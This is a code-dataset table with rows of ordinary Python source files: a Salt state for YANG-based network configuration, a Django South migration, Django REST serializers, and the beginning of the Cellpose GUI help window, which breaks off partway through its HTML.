| hexsha stringlengths 40-40 | size int64 3-1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3-972 | max_stars_repo_name stringlengths 6-130 | max_stars_repo_head_hexsha stringlengths 40-78 | max_stars_repo_licenses listlengths 1-10 | max_stars_count int64 1-191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24-24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24-24 ⌀ | max_issues_repo_path stringlengths 3-972 | max_issues_repo_name stringlengths 6-130 | max_issues_repo_head_hexsha stringlengths 40-78 | max_issues_repo_licenses listlengths 1-10 | max_issues_count int64 1-116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24-24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24-24 ⌀ | max_forks_repo_path stringlengths 3-972 | max_forks_repo_name stringlengths 6-130 | max_forks_repo_head_hexsha stringlengths 40-78 | max_forks_repo_licenses listlengths 1-10 | max_forks_count int64 1-105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24-24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24-24 ⌀ | content stringlengths 3-1.03M | avg_line_length float64 1.13-941k | max_line_length int64 2-941k | alphanum_fraction float64 0-1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| e500e5e44932d22bec329b49d0c02e6c9e60ba18 | 10,187 | py | Python | salt/states/netyang.py | xiaowei582648206/saltx | 1d17b030b973ce5422e0fbe7e17c98c7ca91c49b | ["Apache-2.0"] | 1 | 2022-02-09T06:40:14.000Z | 2022-02-09T06:40:14.000Z | salt/states/netyang.py | xiaowei582648206/saltx | 1d17b030b973ce5422e0fbe7e17c98c7ca91c49b | ["Apache-2.0"] | null | null | null | salt/states/netyang.py | xiaowei582648206/saltx | 1d17b030b973ce5422e0fbe7e17c98c7ca91c49b | ["Apache-2.0"] | 4 | 2020-11-04T06:28:05.000Z | 2022-02-09T10:54:49.000Z |
# -*- coding: utf-8 -*-
'''
NAPALM YANG state
=================
Manage the configuration of network devices according to
the YANG models (OpenConfig/IETF).
.. versionadded:: 2017.7.0
Dependencies
------------
- napalm-yang
- pyangbind > 0.5.11
To be able to load configuration on network devices,
it requires NAPALM_ library to be installed: ``pip install napalm``.
Please check Installation_ for complete details.
.. _NAPALM: https://napalm.readthedocs.io
.. _Installation: https://napalm.readthedocs.io/en/latest/installation.html
'''
from __future__ import absolute_import
import json
import logging
log = logging.getLogger(__file__)
# Import third party libs
try:
import yaml
# pylint: disable=W0611
import napalm_yang
HAS_NAPALM_YANG = True
# pylint: enable=W0611
except ImportError:
HAS_NAPALM_YANG = False
# Import salt modules
from salt.utils import fopen
import salt.utils.napalm
# ------------------------------------------------------------------------------
# state properties
# ------------------------------------------------------------------------------
__virtualname__ = 'napalm_yang'
# ------------------------------------------------------------------------------
# global variables
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# property functions
# ------------------------------------------------------------------------------
def __virtual__():
'''
NAPALM library must be installed for this module to work and run in a (proxy) minion.
This module in particular requires also napalm-yang.
'''
if not HAS_NAPALM_YANG:
return (False, 'Unable to load napalm_yang execution module: please install napalm-yang!')
return salt.utils.napalm.virtual(__opts__, __virtualname__, __file__)
# ------------------------------------------------------------------------------
# helper functions -- will not be exported
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# callable functions
# ------------------------------------------------------------------------------
def managed(name,
data,
models,
**kwargs):
'''
Manage the device configuration given the input data structured
according to the YANG models.
data
YANG structured data.
models
A list of models to be used when generating the config.
profiles: ``None``
Use certain profiles to generate the config.
If not specified, will use the platform default profile(s).
compliance_report: ``False``
Return the compliance report in the comment.
However, the structured compliance report object can be found
in the ``pchanges`` field of the output (not displayed on the CLI).
.. versionadded:: 2017.7.3
test: ``False``
Dry run? If set as ``True``, will apply the config, discard
and return the changes. Default: ``False`` and will commit
the changes on the device.
commit: ``True``
Commit? Default: ``True``.
debug: ``False``
Debug mode. Will insert a new key under the output dictionary,
as ``loaded_config`` containing the raw configuration loaded on the device.
replace: ``False``
Should the newly generated config replace the existing one?
State SLS example:
.. code-block:: jinja
{%- set expected_config = pillar.get('openconfig_interfaces_cfg') -%}
interfaces_config:
napalm_yang.managed:
- data: {{ expected_config | json }}
- models:
- models.openconfig_interfaces
- debug: true
Pillar example:
.. code-block:: yaml
openconfig_interfaces_cfg:
_kwargs:
filter: true
interfaces:
interface:
Et1:
config:
mtu: 9000
Et2:
config:
description: "description example"
'''
ret = salt.utils.napalm.default_ret(name)
test = kwargs.get('test', False) or __opts__.get('test', False)
debug = kwargs.get('debug', False) or __opts__.get('debug', False)
commit = kwargs.get('commit', True) or __opts__.get('commit', True)
replace = kwargs.get('replace', False) or __opts__.get('replace', False)
return_compliance_report = kwargs.get('compliance_report', False) or __opts__.get('compliance_report', False)
profiles = kwargs.get('profiles', [])
temp_file = __salt__['temp.file']()
log.debug('Creating temp file: {0}'.format(temp_file))
if 'to_dict' not in data:
data = {'to_dict': data}
data = [data]
with fopen(temp_file, 'w') as file_handle:
yaml.safe_dump(json.loads(json.dumps(data)), file_handle, encoding='utf-8', allow_unicode=True)
device_config = __salt__['napalm_yang.parse'](models,
config=True,
profiles=profiles)
log.debug('Parsed the config from the device:')
log.debug(device_config)
compliance_report = __salt__['napalm_yang.compliance_report'](device_config,
models,
filepath=temp_file)
log.debug('Compliance report:')
log.debug(compliance_report)
complies = compliance_report.get('complies', False)
if complies:
ret.update({
'result': True,
'comment': 'Already configured as required.'
})
log.debug('All good here.')
return ret
log.debug('Does not comply, trying to generate and load config')
data = data[0]['to_dict']
if '_kwargs' in data:
data.pop('_kwargs')
loaded_changes = __salt__['napalm_yang.load_config'](data,
models,
profiles=profiles,
test=test,
debug=debug,
commit=commit,
replace=replace)
log.debug('Loaded config result:')
log.debug(loaded_changes)
__salt__['file.remove'](temp_file)
loaded_changes['compliance_report'] = compliance_report
return salt.utils.napalm.loaded_ret(ret,
loaded_changes,
test,
debug,
opts=__opts__,
compliance_report=return_compliance_report)
def configured(name,
data,
models,
**kwargs):
'''
Configure the network device, given the input data structured
according to the YANG models.
.. note::
The main difference between this function and ``managed``
is that the latter generates and loads the configuration
only when there are differences between the existing
configuration on the device and the expected
configuration. Depending on the platform and hardware
capabilities, one could be more optimal than the other.
Additionally, the output of ``managed`` is different,
in that the ``pchanges`` field of its output
contains structured data rather than text.
data
YANG structured data.
models
A list of models to be used when generating the config.
profiles: ``None``
Use certain profiles to generate the config.
If not specified, will use the platform default profile(s).
test: ``False``
Dry run? If set as ``True``, will apply the config, discard
and return the changes. Default: ``False`` and will commit
the changes on the device.
commit: ``True``
Commit? Default: ``True``.
debug: ``False``
Debug mode. Will insert a new key under the output dictionary,
as ``loaded_config`` containing the raw configuration loaded on the device.
replace: ``False``
Should the newly generated config replace the existing one?
State SLS example:
.. code-block:: jinja
{%- set expected_config = pillar.get('openconfig_interfaces_cfg') -%}
interfaces_config:
napalm_yang.configured:
- data: {{ expected_config | json }}
- models:
- models.openconfig_interfaces
- debug: true
Pillar example:
.. code-block:: yaml
openconfig_interfaces_cfg:
_kwargs:
filter: true
interfaces:
interface:
Et1:
config:
mtu: 9000
Et2:
config:
description: "description example"
'''
ret = salt.utils.napalm.default_ret(name)
test = kwargs.get('test', False) or __opts__.get('test', False)
debug = kwargs.get('debug', False) or __opts__.get('debug', False)
commit = kwargs.get('commit', True) or __opts__.get('commit', True)
replace = kwargs.get('replace', False) or __opts__.get('replace', False)
profiles = kwargs.get('profiles', [])
if '_kwargs' in data:
data.pop('_kwargs')
loaded_changes = __salt__['napalm_yang.load_config'](data,
models,
profiles=profiles,
test=test,
debug=debug,
commit=commit,
replace=replace)
return salt.utils.napalm.loaded_ret(ret, loaded_changes, test, debug)
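# --- Illustrative sketch (not part of the Salt module above) ---------------
# The control flow of managed() boils down to: check compliance first, and
# only generate/load configuration when the device does not comply, stripping
# the pillar-only ``_kwargs`` marker before loading. ``compliance_report`` and
# ``load_config`` below are hypothetical stand-ins for the ``napalm_yang.*``
# execution-module calls used above.
def _managed_flow_sketch(data, compliance_report, load_config):
    report = compliance_report(data)
    if report.get('complies', False):
        return {'result': True, 'comment': 'Already configured as required.'}
    data = dict(data)
    data.pop('_kwargs', None)
    changes = load_config(data)
    changes['compliance_report'] = report
    return {'result': None, 'changes': changes}
# Example with dummy callables:
# _managed_flow_sketch({'_kwargs': {'filter': True}, 'interfaces': {}},
#                      compliance_report=lambda d: {'complies': False},
#                      load_config=lambda d: {'diff': '+ mtu 9000'})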
| 35.371528 | 113 | 0.52194 |
| 0af5033bb269c91d17e8ec3622a5e20b0f0044f6 | 18,152 | py | Python | tbonlineproject/post/migrations/0013_auto__add_editorchoice.py | nathangeffen/tbonline3 | 1b8a3af8d2dc1ee8083ca6638d025e94bd98f253 | ["MIT"] | null | null | null | tbonlineproject/post/migrations/0013_auto__add_editorchoice.py | nathangeffen/tbonline3 | 1b8a3af8d2dc1ee8083ca6638d025e94bd98f253 | ["MIT"] | 3 | 2021-06-08T23:57:13.000Z | 2022-01-13T03:42:01.000Z | tbonlineproject/post/migrations/0013_auto__add_editorchoice.py | nathangeffen/tbonline-2 | 0d5869197e66a0057fa07cb99f21dde7f5b47c30 | ["MIT"] | null | null | null |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'EditorChoice'
db.create_table('post_editorchoice', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('comment', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['comments.Comment'], unique=True)),
('editors_choice', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('post', ['EditorChoice'])
def backwards(self, orm):
# Deleting model 'EditorChoice'
db.delete_table('post_editorchoice')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'categories.category': {
'Meta': {'object_name': 'Category'},
'description': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\W'", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'comments.comment': {
'Meta': {'ordering': "('submit_date',)", 'object_name': 'Comment', 'db_table': "'django_comments'"},
'comment': ('django.db.models.fields.TextField', [], {'max_length': '3000'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_comment'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_removed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_pk': ('django.db.models.fields.TextField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'submit_date': ('django.db.models.fields.DateTimeField', [], {'default': 'None'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comment_comments'", 'null': 'True', 'to': "orm['auth.User']"}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'user_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'user_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'copyright.copyright': {
'Meta': {'ordering': "['title']", 'object_name': 'Copyright'},
'easy_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'html_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legal_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'credit.credit': {
'Meta': {'ordering': "['last_name', 'first_names']", 'object_name': 'Credit'},
'first_names': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_person': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'credit.orderedcredit': {
'Meta': {'ordering': "['position']", 'unique_together': "(('credit', 'content_type', 'object_id'),)", 'object_name': 'OrderedCredit'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'credit': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['credit.Credit']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'position': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'gallery.gallery': {
'Meta': {'ordering': "['-last_modified']", 'object_name': 'Gallery'},
'copyright': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['copyright.Copyright']", 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\W'", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['gallery.Image']", 'null': 'True', 'through': "orm['gallery.OrderedImage']", 'blank': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'gallery.image': {
'Meta': {'ordering': "['-last_modified']", 'object_name': 'Image'},
'caption': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'copyright': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['copyright.Copyright']", 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\W'", 'blank': 'True'}),
'file': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'preferred_size': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'gallery.orderedimage': {
'Meta': {'ordering': "['gallery', 'position']", 'unique_together': "(('gallery', 'image'),)", 'object_name': 'OrderedImage'},
'gallery': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gallery.Gallery']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gallery.Image']"}),
'position': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'post.basicpost': {
'Meta': {'ordering': "['-sticky', '-date_published']", 'unique_together': "(('slug', 'date_published'),)", 'object_name': 'BasicPost'},
'allow_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'body': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\W'", 'blank': 'True'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['categories.Category']", 'null': 'True', 'blank': 'True'}),
'copyright': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['copyright.Copyright']", 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'detail_post_css_classes': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'detail_post_template': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'homepage': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'introduction': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\W'", 'blank': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'list_post_css_classes': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'list_post_template': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'pullout_text': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sites.Site']", 'symmetrical': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'sticky': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'teaser': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\W'", 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'post.editorchoice': {
'Meta': {'object_name': 'EditorChoice'},
'comment': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['comments.Comment']", 'unique': 'True'}),
'editors_choice': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'post.postwithembeddedobject': {
'Meta': {'ordering': "['-sticky', '-date_published']", 'object_name': 'PostWithEmbeddedObject', '_ormbases': ['post.BasicPost']},
'basicpost_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['post.BasicPost']", 'unique': 'True', 'primary_key': 'True'}),
'detail_post_embedded_html': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\H'", 'blank': 'True'}),
'list_post_embedded_html': ('enhancedtext.fields.EnhancedTextField', [], {'default': "'\\\\H'", 'blank': 'True'})
},
'post.postwithimage': {
'Meta': {'ordering': "['-sticky', '-date_published']", 'object_name': 'PostWithImage', '_ormbases': ['post.BasicPost']},
'basicpost_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['post.BasicPost']", 'unique': 'True', 'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gallery.Image']", 'null': 'True', 'blank': 'True'})
},
'post.postwithsimpleimage': {
'Meta': {'ordering': "['-sticky', '-date_published']", 'object_name': 'PostWithSimpleImage', '_ormbases': ['post.BasicPost']},
'basicpost_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['post.BasicPost']", 'unique': 'True', 'primary_key': 'True'}),
'caption': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'image': ('sorl.thumbnail.fields.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'post.postwithslideshow': {
'Meta': {'ordering': "['-sticky', '-date_published']", 'object_name': 'PostWithSlideshow', '_ormbases': ['post.BasicPost']},
'basicpost_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['post.BasicPost']", 'unique': 'True', 'primary_key': 'True'}),
'gallery': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['gallery.Gallery']", 'null': 'True', 'blank': 'True'}),
'slideshow_options': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'post.submittedarticle': {
'Meta': {'object_name': 'SubmittedArticle'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'submitted_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'submitted_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'tagging.tag': {
'Meta': {'ordering': "('name',)", 'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'tagging.taggeditem': {
'Meta': {'unique_together': "(('tag', 'content_type', 'object_id'),)", 'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['tagging.Tag']"})
}
}
complete_apps = ['post']
| 81.035714 | 210 | 0.55498 |
| 8d352f7a6d126cb9ca9388638dfaae9c860b5f91 | 3,045 | py | Python | src/igfeedservice/IgFeedService/serializers.py | MatthewWong68/Social_Media_RESTful_API_Django_Web_App | 60d0f2af067071bc8fc6f9da4a810d35bfad3443 | ["MIT"] | null | null | null | src/igfeedservice/IgFeedService/serializers.py | MatthewWong68/Social_Media_RESTful_API_Django_Web_App | 60d0f2af067071bc8fc6f9da4a810d35bfad3443 | ["MIT"] | null | null | null | src/igfeedservice/IgFeedService/serializers.py | MatthewWong68/Social_Media_RESTful_API_Django_Web_App | 60d0f2af067071bc8fc6f9da4a810d35bfad3443 | ["MIT"] | null | null | null |
from rest_framework import serializers
from .models import Post, Hashtag, Page
# from .models import PostHistory
class PostSerializer(serializers.Serializer):
id = serializers.CharField(max_length=31)
full_text = serializers.CharField(max_length=8191)
author_name = serializers.CharField(max_length=255)
crawled_dt = serializers.DateTimeField()
post_dt = serializers.DateTimeField()
like = serializers.IntegerField(default=0)
comment = serializers.IntegerField(default=0)
# Create <=> POST
def create(self, validated_data):
return Post.objects.create(**validated_data)
# Update <=> PUT
def update(self, instance, validated_data):
instance.id = validated_data.get('id', instance.id)
instance.full_text = validated_data.get('full_text', instance.full_text)
instance.author_name = validated_data.get('author_name', instance.author_name)
instance.crawled_dt = validated_data.get('crawled_dt', instance.crawled_dt)
instance.post_dt = validated_data.get('post_dt', instance.post_dt)
instance.like = validated_data.get('like', instance.like)
instance.comment = validated_data.get('comment', instance.comment)
instance.save()
return instance
class HashtagSerializer(serializers.Serializer):
id = serializers.IntegerField()
feedID = serializers.CharField(max_length=20)
text = serializers.CharField(max_length=255)
# Create <=> POST
def create(self, validated_data):
return Hashtag.objects.create(**validated_data)
# Update <=> PUT
def update(self, instance, validated_data):
instance.id = validated_data.get('id', instance.id)
instance.feedID = validated_data.get('feedID', instance.feedID)
instance.text = validated_data.get('text', instance.text)
instance.save()
return instance
class PageSerializer(serializers.Serializer):
id = serializers.IntegerField()
author_name = serializers.CharField(max_length=255)
posts = serializers.IntegerField(default=0)
followers = serializers.IntegerField(default=0)
following = serializers.IntegerField(default=0)
# Create <=> POST
def create(self, validated_data):
return Page.objects.create(**validated_data)
# Update <=> PUT
def update(self, instance, validated_data):
instance.id = validated_data.get('id', instance.id)
instance.author_name = validated_data.get('author_name', instance.author_name)
instance.posts = validated_data.get('posts', instance.posts)
instance.followers = validated_data.get('followers', instance.followers)
instance.following = validated_data.get('following', instance.following)
instance.save()
return instance
# class PostHistorySerializer(serializers.Serializer):
# # Create <=> POST
# def create(self, validated_data):
# return PostHistory.objects.create(**validated_data)
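# --- Illustrative usage sketch (not part of the original file) -------------
# With serializers.Serializer subclasses like the ones above, serializer.save()
# dispatches to create() when no instance is passed and to update() when one
# is. This assumes a configured Django project with djangorestframework
# installed and the Post model migrated; the payload values below are made up.
def _example_post_roundtrip():
    payload = {
        'id': '1', 'full_text': 'hello world', 'author_name': 'someone',
        'crawled_dt': '2020-01-01T00:00:00Z', 'post_dt': '2020-01-01T00:00:00Z',
    }
    serializer = PostSerializer(data=payload)
    serializer.is_valid(raise_exception=True)
    post = serializer.save()                      # -> PostSerializer.create()
    serializer = PostSerializer(post, data=dict(payload, like=5))
    serializer.is_valid(raise_exception=True)
    return serializer.save()                      # -> PostSerializer.update()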
| 41.148649 | 87 | 0.693596 |
| 3a8fb87ee84b095d3cdc59036a74c044a9258674 | 24,763 | py | Python | cellpose/guiparts.py | Czaki/cellpose | fe3a0f9c18323faffd05fffe760dc29db22624f6 | ["BSD-3-Clause"] | 1 | 2020-08-11T13:04:37.000Z | 2020-08-11T13:04:37.000Z | cellpose/guiparts.py | Czaki/cellpose | fe3a0f9c18323faffd05fffe760dc29db22624f6 | ["BSD-3-Clause"] | null | null | null | cellpose/guiparts.py | Czaki/cellpose | fe3a0f9c18323faffd05fffe760dc29db22624f6 | ["BSD-3-Clause"] | null | null | null |
from PyQt5 import QtGui, QtCore, QtWidgets
import pyqtgraph as pg
from pyqtgraph import functions as fn
from pyqtgraph import Point
import numpy as np
class HelpWindow(QtGui.QDialog):
def __init__(self, parent=None):
super(HelpWindow, self).__init__(parent)
self.setGeometry(100,100,700,800)
self.setWindowTitle('cellpose help')
self.win = QtGui.QWidget(self)
layout = QtGui.QGridLayout()
self.win.setLayout(layout)
text = ('''
<p class="has-line-data" data-line-start="5" data-line-end="6">Main GUI mouse controls:</p>
<ul>
<li class="has-line-data" data-line-start="7" data-line-end="8">Pan = left-click + drag</li>
<li class="has-line-data" data-line-start="8" data-line-end="9">Zoom = scroll wheel</li>
<li class="has-line-data" data-line-start="9" data-line-end="10">Full view = double left-click</li>
<li class="has-line-data" data-line-start="10" data-line-end="11">Select mask = left-click on mask</li>
<li class="has-line-data" data-line-start="11" data-line-end="12">Delete mask = Ctrl + left-click</li>
<li class="has-line-data" data-line-start="12" data-line-end="13">Start draw mask = right-click</li>
<li class="has-line-data" data-line-start="13" data-line-end="15">End draw mask = right-click, or return to circle at beginning</li>
</ul>
<p class="has-line-data" data-line-start="15" data-line-end="16">Overlaps in masks are NOT allowed. If you draw a mask on top of another mask, it is cropped so that it doesn’t overlap with the old mask. Masks in 2D should be single strokes (single stroke is checked). If you want to draw masks in 3D (experimental), then you can turn this option off and draw a stroke on each plane with the cell and then press ENTER. 3D labelling will fill in planes that you have not labelled so that you do not have to as densely label.</p>
<p class="has-line-data" data-line-start="17" data-line-end="18">!NOTE!: The GUI automatically saves after you draw a mask in 2D but NOT after 3D mask drawing and NOT after segmentation. Save in the file menu or with Ctrl+S. The output file is in the same folder as the loaded image with <code>_seg.npy</code> appended.</p>
<table class="table table-striped table-bordered">
<br><br>
<thead>
<tr>
<th>Keyboard shortcuts</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>CTRL+Z</td>
<td>undo previously drawn mask/stroke</td>
</tr>
<tr>
<td>CTRL+0</td>
<td>clear all masks</td>
</tr>
<tr>
